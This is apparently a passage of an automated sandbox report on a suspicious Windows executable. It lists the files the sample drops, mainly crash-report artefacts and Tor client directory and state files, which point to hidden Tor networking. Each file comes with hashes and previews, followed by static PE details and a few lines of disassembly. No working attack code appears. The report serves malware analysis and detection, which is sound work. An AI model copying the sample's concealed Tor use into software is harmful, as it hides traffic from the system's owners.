                                                                                                                                                                                                    Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.2.4.0.<./.P.i.

                                                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER7CBB.tmp.xml

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):4578
                                                                                                                                                                                                    Entropy (8bit):4.4680257951074
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:48:cvIwWl8zsBJg77aI93cWpW8VYBYm8M4Js/vL/PjFdd+q8T9JDGiHozziUCDUydd:uIjfTI75V7VRJMT7d0JPIzxCwydd
                                                                                                                                                                                                    MD5:ED4C59B3B71C332D555F780711DD5E18
                                                                                                                                                                                                    SHA1:9A5FA764B02A31CBD96D4A523826212E648DCC48
                                                                                                                                                                                                    SHA-256:F73F372E4FA1C814BE5290B6B4A7FE80B07A9B062777663CC2E5B3445EDA09BE
                                                                                                                                                                                                    SHA-512:C7F08AEDB03E0319137955477C7ACCFE0A5ABDF3B72320348BDEE96DA850AE1031AC4E19CDE57011D56C23EF50540FEC304FCF52CB186932D5A70F21E86A8626
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="77582" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096

                                                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WERB1C3.tmp.dmp

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                    File Type:Mini DuMP crash report, 15 streams, Sun Nov 26 06:00:09 2023, 0x1205a4 type
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):4181286
                                                                                                                                                                                                    Entropy (8bit):2.2936444474485844
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12288:4Ct1UyUXIK4nXvO8tZMu7Q1ZPMq7z50snmCV3D4a6+echcQhnqFWVXA/NbFtWzu5:4gIUwaObebb7w
                                                                                                                                                                                                    MD5:D076ACA5F3C9BD472022F326CB38D9A4
                                                                                                                                                                                                    SHA1:433953334438BF63EE7F71E746D333BC5B241378
                                                                                                                                                                                                    SHA-256:9C89307A51E5CE2AF91DF7CF9AEF34D72E8C7C7E27A51F82EEACA9045567E3F7
                                                                                                                                                                                                    SHA-512:3516215DABB4185B9E68E5A21F409C1C6FF943E4E78EFD9E73F10F8A43D958F81ECDF1EBD7C3BC7BEB789B90D9465DCBEE7A346DC8B9749901565301B3385DB5
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview:MDMP..a..... .........be............4f..............Hm......,...<.......T...t...........`.......8...........T.................<.........h...........T...............................................................................eJ.............GenuineIntel............T.......`.....be.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WERCD4B.tmp.WERInternalMetadata.xml

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):6334
                                                                                                                                                                                                    Entropy (8bit):3.7227234572165737
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:96:RSIU6o7wVetbqgx6hsYHdOdBmNzAgaMQUG89b+msfDkp7Gm:R6l7wVeJLx6qYYj8pDG89b+msfcqm
                                                                                                                                                                                                    MD5:F690B75361B4E652E93B710C97248612
                                                                                                                                                                                                    SHA1:5F81E0C88789A4F9DAB8A88147E62EB8AF563023
                                                                                                                                                                                                    SHA-256:0BB9878E0CD4D18C817ECE1ADE9DA315C3BEAC07248B1C1CF03614E60401371E
                                                                                                                                                                                                    SHA-512:A6BE599D3EE2A204AF0EC9707E0222857DD64CCC64348F1B94512E07EA69AA078D6683F31F0ABDA34DEB22F28F97B8780D806ABDE420160A141A3A2764C2AE9D
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.2.4.0.<./.P.i.

                                                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WERCD8A.tmp.xml

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):4578
                                                                                                                                                                                                    Entropy (8bit):4.467615013639689
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:48:cvIwWl8zsBJg77aI93cWpW8VY6cYm8M4Js/vL/PjFfU+q8T9JDGiHozziUCDUydd:uIjfTI75V7Vf5JMTNU0JPIzxCwydd
                                                                                                                                                                                                    MD5:C8114667CD912CD706B3AAEBFA166A06
                                                                                                                                                                                                    SHA1:CDA7B2D712F0F76C07495FA28769C0AA7A36A4F8
                                                                                                                                                                                                    SHA-256:975147FEBD562C0E93DDB3A7D123622E867F2A0ADE7705BAC94A79B81E9AD8D1
                                                                                                                                                                                                    SHA-512:B3CEDBE028FC3F6581D9A2AA406F2054F66184FBA2227307DCA50E2DEB5BAB9BCEAFD592AA1EE6DF0B3BC8EF8F83B82E26002AD13EAC44A92F4225B5400C2D42
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="77582" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096

                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\4kPv6aJG8e\cached-certs.tmp

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):16296
                                                                                                                                                                                                    Entropy (8bit):6.052007825910585
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:384:7d24ZFtVf1hc1x2h4YVc1h1yd4AW9V9hC1hIhaU4XVy41h9Yc2q48XVd91hMBtMk:Z2M1ux6xyhyrqvUg32xi8nX98RBkoich
                                                                                                                                                                                                    MD5:D6C8A4CD9393E4D2AC938D24FB24C6D5
                                                                                                                                                                                                    SHA1:13E3DC3A0C1CBE12884C029FCDF16ECC3F7D9B6E
                                                                                                                                                                                                    SHA-256:3C66AE57D981E559AC1FCAF236AB63D9D7811F97F49D9BB51F8D27CF2781481D
                                                                                                                                                                                                    SHA-512:691D4B4AEA631872E24C06F8AC64B712416E47A4987A6FE63E6D5C5A24A218C6A5973688DCDFC261FC90A36CAE518E749C6E59805F6B76B68E8A0768627D45EB
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview:dir-key-certificate-version 3..fingerprint ED03BB616EB2F60BEC80151114BB25CEF515B226..dir-key-published 2023-03-05 22:55:19..dir-key-expires 2024-03-05 22:55:19..dir-identity-key..-----BEGIN RSA PUBLIC KEY-----..MIIBigKCAYEA1d6uTRiqdMp4BHBYIHKR6NB599Z1Bqw4TbOVkM2N1aSA4V/L/hKI..nl6m/2LL/UAS+E3NCFX0dhw2+D7r7BTJyfGwz0H2MR6Py5/rCMAnPl20wCjXk2qY..ACQa0rJvIqXobwGnDlvxn4ezsj0IEY/FEb61zHnnPHf6d3uyFR1QT06qEOQyYzML..76f/Lud8MUt+8KzsdnadAPL8okNvcS/nqa2bWbbGhC8S8rtDpPg5BhX2ikXa88RM..QdrrackdppB2ttHlq9+iH3c8Wyp7bvdH8uhv410W7RnIE4P+KIxt3L0gqkxCjjyh..mn9ONcdgNOKe31q2cdW5LOPSIK+I5/VTjYjICza7Euyg03drpoBMGLuuJZY6FXEV..auIBncWe+So8FMxqU/fwo5xm6x085U1MwXUmi4XDYpr/kau6ytPnzzw9J++4W9iC..em5Jp0vaxrDnPdphqT0FWsBAwsZFL7nZRnmUlTgGsXUa0oSM9/MErDwzELh/NwG4..DNyyzRG8iP61AgMBAAE=..-----END RSA PUBLIC KEY-----..dir-signing-key..-----BEGIN RSA PUBLIC KEY-----..MIIBCgKCAQEAvaQxritqKpbDk3YHM5nZdb7HiyF9oJ8jgxja4uwda5+q7JD4ZDSp..fZPR5jet7Ceijf69XjniJQB7HOQOwWe4QDujylFMRYT/JlBlWGQd+48UXdgyjJ/a..6p0pOp7mus6956GRwijqL8uvFQYK

                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\4kPv6aJG8e\cached-microdesc-consensus.tmp

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    File Type:ASCII text, with very long lines (1006)
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):2767636
                                                                                                                                                                                                    Entropy (8bit):5.617887675466888
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12288:eeSgYkg1NDo+/7ORpGAMAI6IsZr3i7fsd1enQ2tfhvEN7CDawxYARLXbed3c:YgY/zJ7ORprtryr6QQ2FhRa+RLw3c
                                                                                                                                                                                                    MD5:974C50C59A0C08C693CD0E89B25C611E
                                                                                                                                                                                                    SHA1:DFB0ADD696CDFB6DEA30B85CE804BFB19A1CF0FF
                                                                                                                                                                                                    SHA-256:431220F091535B808C18699FD5C9C1E0750C225B59671460D707B318E20D2099
                                                                                                                                                                                                    SHA-512:196DB0D36D3B9F6566DA86239BD8F9E81E25C372EDD5D8C646E576B692890B04BF25AC4438C996D8CB8C79BD091066C90FF657C051C9F530D33BB6EF6E25CAD5
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview:network-status-version 3 microdesc.vote-status consensus.consensus-method 33.valid-after 2023-11-26 05:00:00.fresh-until 2023-11-26 06:00:00.valid-until 2023-11-26 08:00:00.voting-delay 300 300.client-versions 0.4.7.7,0.4.7.8,0.4.7.10,0.4.7.11,0.4.7.12,0.4.7.13,0.4.7.14,0.4.7.15,0.4.7.16,0.4.8.1-alpha,0.4.8.2-alpha,0.4.8.3-rc,0.4.8.4,0.4.8.5,0.4.8.6,0.4.8.7,0.4.8.8,0.4.8.9.server-versions 0.4.7.7,0.4.7.8,0.4.7.10,0.4.7.11,0.4.7.12,0.4.7.13,0.4.7.14,0.4.7.15,0.4.7.16,0.4.8.1-alpha,0.4.8.2-alpha,0.4.8.3-rc,0.4.8.4,0.4.8.5,0.4.8.6,0.4.8.7,0.4.8.8,0.4.8.9.known-flags Authority BadExit Exit Fast Guard HSDir MiddleOnly NoEdConsensus Running Stable StaleDesc Sybil V2Dir Valid.recommended-client-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 Microdesc=2 Relay=2.recommended-relay-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 LinkAuth=3 Microdesc=2 Relay=2.required-client-protocols Cons=2 Desc=2 Link=4 Microdesc=2 Relay=2.required-relay-protocols

                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\4kPv6aJG8e\cached-microdescs.new

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    File Type:ASCII text, with very long lines (16386)
                                                                                                                                                                                                    Category:modified
                                                                                                                                                                                                    Size (bytes):21064813
                                                                                                                                                                                                    Entropy (8bit):4.826245633389893
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24576:rUDI7X8P4nl8J4WbmL5dyfZxqO36Nd79MFP9l9B8MZ6YnOYZ0L29GwoPIs0KMs23:qgW4h0MFpnLnXk5fndCQ3ke31RbwYH
                                                                                                                                                                                                    MD5:6A3995FDE2F857849499245A4F16240D
                                                                                                                                                                                                    SHA1:87D749B89B0935AB834E0EDBEAD8316DE403AC2A
                                                                                                                                                                                                    SHA-256:365983F20FDC005BFE7B78250C4D7AC9E51FC590BDD9081D8DF84920CE043302
                                                                                                                                                                                                    SHA-512:1A3200A57ED8E5EA3352CDA6025CA850F846DFCDF33C4AF6BFED8A339CD2EADBCCD27CD9BC29E9538E78224FDFF64493DA5DA8C5F0813B5FA972A051207F18E8
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview:@last-listed 2023-11-26 05:58:57.onion-key.-----BEGIN RSA PUBLIC KEY-----.MIGJAoGBANnjMpj+LGelayMTuDEbYE+IWcaxM0aZ1C1ZgLBafrf+l/Nc+V0cWxLV.HM2zVoCwa+x4zNsYtA7VJIR+G5cLGKy1YbMtb5i89uCLmvk5JV+sJr6GsFoDIyGW.PSgAzQRLDJnrZbYQe7K98ilK7Oc2gj4rKYzzeM6tkA4pLCco7t7LAgMBAAE=.-----END RSA PUBLIC KEY-----.ntor-onion-key lU8+UY0MaMkgsA/Uhhj0W+Pxb6vMcIQTtUzTTWL2iTE.family $00CC3A3D92C33E171BBDAEACC4601173BFA24150 $0145977CF1D2D4AAF98907BF81DAAD8480EFC3FD $02EC629306C61EE1D3BDD4DD978514B99E226EA0 $038B2A774C859796FC11D26DB7F16494708F7749 $045BBCA9602A22C112984F25003CD4897CFFB9E5 $06A64BF11983B8323FF7EEDCE5C35A0543523B54 $06B07DD797C5D54D61DB9AAC4554AB7C4845549B $0B06DD6A65C48EA79FC43031CBD93650B08A0661 $12C2B0CD1B8C7A12229A7C36E134274550DCD7F4 $12CD9B24FB7F981E800F86A37DEFA47B4AE572DC $1CCA5C61826AA2C48310BD771E7B0A96FF6BCA6D $1D24292113610F0096FCC554664EC33BE27A4F54 $1D7EBE2ADBEF0353AA77C579CD013B5CF82E740D $1F953ACBFB9F44CE38543B7E9C0E0BE1BDC7E941 $22031066AA0C1A8CD90E2BC03CB60A4AAF713EF6 $245C88E53

                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\4kPv6aJG8e\state.tmp

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    File Type:ASCII text, with very long lines (356), with CRLF line terminators
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):4227
                                                                                                                                                                                                    Entropy (8bit):5.302243346969084
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:48:c7/QxaSLDggEshKm5Fgx0tHxKZwLSl0UausrWVxNl64fPHKkY:4YDggEsYmHgx2G05KVLVPqkY
                                                                                                                                                                                                    MD5:765E24E127075F44F60BBEC82AB85290
                                                                                                                                                                                                    SHA1:0F64AC8072F9FB23CF5BBA0A5366047CA239C65D
                                                                                                                                                                                                    SHA-256:C236F5D3357ADBAA1FE4BCC6537A0E674689CCF3E6EF703D44ED6275C9D33455
                                                                                                                                                                                                    SHA-512:1083EB3A28006F5505F3D90D58916CBB853C4C3138347E14B0D62A114299F6762F3593F114824D7E300BE132F9F3DFBFF9F99596385AD4857D94F893606AECCD
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview:# Tor state file last generated on 2023-11-26 06:59:58 local time..# Other times below are in UTC..# You *do not* need to edit this file.....CircuitBuildTimeBin 725 1..CircuitBuildTimeBin 775 1..CircuitBuildTimeBin 825 2..CircuitBuildTimeBin 875 1..CircuitBuildTimeBin 925 1..CircuitBuildTimeBin 975 1..CircuitBuildTimeBin 1025 1..CircuitBuildTimeBin 1075 2..CircuitBuildTimeBin 1175 1..CircuitBuildTimeBin 1225 1..CircuitBuildTimeBin 1275 1..CircuitBuildTimeBin 1425 2..CircuitBuildTimeBin 1475 1..CircuitBuildTimeBin 1625 2..CircuitBuildTimeBin 2375 2..CircuitBuildTimeBin 12275 1..Dormant 0..Guard in=default rsa_id=BF93594384A02DE7689C4FD821E2638DA2CD4792 nickname=labaliseridicule sampled_on=2023-11-25T20:14:43 sampled_idx=0 sampled_by=0.4.4.9 listed=1 confirmed_on=2023-11-25T14:22:11 confirmed_idx=1 pb_use_attempts=8.000000 pb_use_successes=8.000000 pb_circ_attempts=10.000000 pb_circ_successes=9.000000 pb_successful_circuits_closed=9.000000..Guard in=default rsa_id=B8D3B9067FAA01EAACBC688

                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\4kPv6aJG8e\unverified-microdesc-consensus.tmp

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    File Type:ASCII text, with very long lines (1006)
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):2767636
                                                                                                                                                                                                    Entropy (8bit):5.617887675466888
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12288:eeSgYkg1NDo+/7ORpGAMAI6IsZr3i7fsd1enQ2tfhvEN7CDawxYARLXbed3c:YgY/zJ7ORprtryr6QQ2FhRa+RLw3c
                                                                                                                                                                                                    MD5:974C50C59A0C08C693CD0E89B25C611E
                                                                                                                                                                                                    SHA1:DFB0ADD696CDFB6DEA30B85CE804BFB19A1CF0FF
                                                                                                                                                                                                    SHA-256:431220F091535B808C18699FD5C9C1E0750C225B59671460D707B318E20D2099
                                                                                                                                                                                                    SHA-512:196DB0D36D3B9F6566DA86239BD8F9E81E25C372EDD5D8C646E576B692890B04BF25AC4438C996D8CB8C79BD091066C90FF657C051C9F530D33BB6EF6E25CAD5
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview:network-status-version 3 microdesc.vote-status consensus.consensus-method 33.valid-after 2023-11-26 05:00:00.fresh-until 2023-11-26 06:00:00.valid-until 2023-11-26 08:00:00.voting-delay 300 300.client-versions 0.4.7.7,0.4.7.8,0.4.7.10,0.4.7.11,0.4.7.12,0.4.7.13,0.4.7.14,0.4.7.15,0.4.7.16,0.4.8.1-alpha,0.4.8.2-alpha,0.4.8.3-rc,0.4.8.4,0.4.8.5,0.4.8.6,0.4.8.7,0.4.8.8,0.4.8.9.server-versions 0.4.7.7,0.4.7.8,0.4.7.10,0.4.7.11,0.4.7.12,0.4.7.13,0.4.7.14,0.4.7.15,0.4.7.16,0.4.8.1-alpha,0.4.8.2-alpha,0.4.8.3-rc,0.4.8.4,0.4.8.5,0.4.8.6,0.4.8.7,0.4.8.8,0.4.8.9.known-flags Authority BadExit Exit Fast Guard HSDir MiddleOnly NoEdConsensus Running Stable StaleDesc Sybil V2Dir Valid.recommended-client-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 Microdesc=2 Relay=2.recommended-relay-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 LinkAuth=3 Microdesc=2 Relay=2.required-client-protocols Cons=2 Desc=2 Link=4 Microdesc=2 Relay=2.required-relay-protocols

                                                                                                                                                                                                    C:\Windows\appcompat\Programs\Amcache.hve

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                    File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1835008
                                                                                                                                                                                                    Entropy (8bit):4.465445695142004
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:6144:0IXfpi67eLPU9skLmb0b4+WSPKaJG8nAgejZMMhA2gX4WABl0uN8dwBCswSbN:JXD94+WlLZMM6YFHO+N
                                                                                                                                                                                                    MD5:812BEB3BB13A8096085654919D9E81BD
                                                                                                                                                                                                    SHA1:599BC8F520E72262271A44787E9F6FFBF83865AB
                                                                                                                                                                                                    SHA-256:62A7F3462BC19F727329A2F64C99470E36FDD2FE301B370F1BDE67A107560862
                                                                                                                                                                                                    SHA-512:38B0F59AAD81A0C2802F7080FC2696C858CD46054D3D6736631FEB86C076D512D6F368B3F6FF2F2E4996CBF60A1E96DBFE67AACB0A3A87F85BD2F2EFD909A3B7
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview:regf8...8....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtmv...- ...............................................................................................................................................................................................................................................................................................................................................O..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                    Static File Info

                                                                                                                                                                                                    General

                                                                                                                                                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                    Entropy (8bit):7.914331766253071
                                                                                                                                                                                                    TrID:
                                                                                                                                                                                                    • Win32 Executable (generic) a (10002005/4) 99.81%
                                                                                                                                                                                                    • Windows Screen Saver (13104/52) 0.13%
                                                                                                                                                                                                    • Clipper DOS Executable (2020/12) 0.02%
                                                                                                                                                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                    File name:klWGq3yDcQ.exe
                                                                                                                                                                                                    File size:1'973'248 bytes
                                                                                                                                                                                                    MD5:fe049ddd0ffd2df34da564208aff9cec
                                                                                                                                                                                                    SHA1:1df42bae63a1698b6070b198f9dceb3ac2b1338e
                                                                                                                                                                                                    SHA256:aa16eed6abd2118df6b0670813ae3b9dab59b458bdc76222866c9a9fc0fa1409
                                                                                                                                                                                                    SHA512:b46e677b3366e395a96761c768112acb01acfeacc92bc5f2749a923bcbc33e4ee6a1d9f5156cf6e250e217e79111e576f5567eae2f7eb381ffa2e08162f1ffbc
                                                                                                                                                                                                    SSDEEP:49152:T9+v9qBhn3hRk9XkSxV4QFTNXopKJe8FtU+0:5wqBZTk9X7bFTSphIK
                                                                                                                                                                                                    TLSH:4895232374E0FC75C4660331DD2CA7DC7BAD78A4AE2297873628BE4E29300B1E567765
                                                                                                                                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................................................................................................PE..L......c.................$.

                                                                                                                                                                                                    File Icon

                                                                                                                                                                                                    Icon Hash:4945415525514509

                                                                                                                                                                                                    Static PE Info

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Entrypoint:0x4061a5
                                                                                                                                                                                                    Entrypoint Section:.text
                                                                                                                                                                                                    Digitally signed:false
                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                    Subsystem:windows gui
                                                                                                                                                                                                    Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                    DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                                                                                                                                    Time Stamp:0x6385B690 [Tue Nov 29 07:36:48 2022 UTC]
                                                                                                                                                                                                    TLS Callbacks:
                                                                                                                                                                                                    CLR (.Net) Version:
                                                                                                                                                                                                    OS Version Major:5
                                                                                                                                                                                                    OS Version Minor:0
                                                                                                                                                                                                    File Version Major:5
                                                                                                                                                                                                    File Version Minor:0
                                                                                                                                                                                                    Subsystem Version Major:5
                                                                                                                                                                                                    Subsystem Version Minor:0
                                                                                                                                                                                                    Import Hash:26174cd618191e0f458fd2f9d0ece6c1

                                                                                                                                                                                                    Entrypoint Preview

                                                                                                                                                                                                    Instruction
                                                                                                                                                                                                    call 00007FF9B8E7B146h
                                                                                                                                                                                                    jmp 00007FF9B8E756ADh
                                                                                                                                                                                                    int3
                                                                                                                                                                                                    mov ecx, dword ptr [esp+04h]
                                                                                                                                                                                                    test ecx, 00000003h
                                                                                                                                                                                                    je 00007FF9B8E75856h
                                                                                                                                                                                                    mov al, byte ptr [ecx]
                                                                                                                                                                                                    add ecx, 01h
                                                                                                                                                                                                    test al, al
                                                                                                                                                                                                    je 00007FF9B8E75880h
                                                                                                                                                                                                    test ecx, 00000003h
                                                                                                                                                                                                    jne 00007FF9B8E75821h
                                                                                                                                                                                                    add eax, 00000000h
                                                                                                                                                                                                    lea esp, dword ptr [esp+00000000h]
                                                                                                                                                                                                    lea esp, dword ptr [esp+00000000h]
                                                                                                                                                                                                    mov eax, dword ptr [ecx]
                                                                                                                                                                                                    mov edx, 7EFEFEFFh
                                                                                                                                                                                                    add edx, eax
                                                                                                                                                                                                    xor eax, FFFFFFFFh
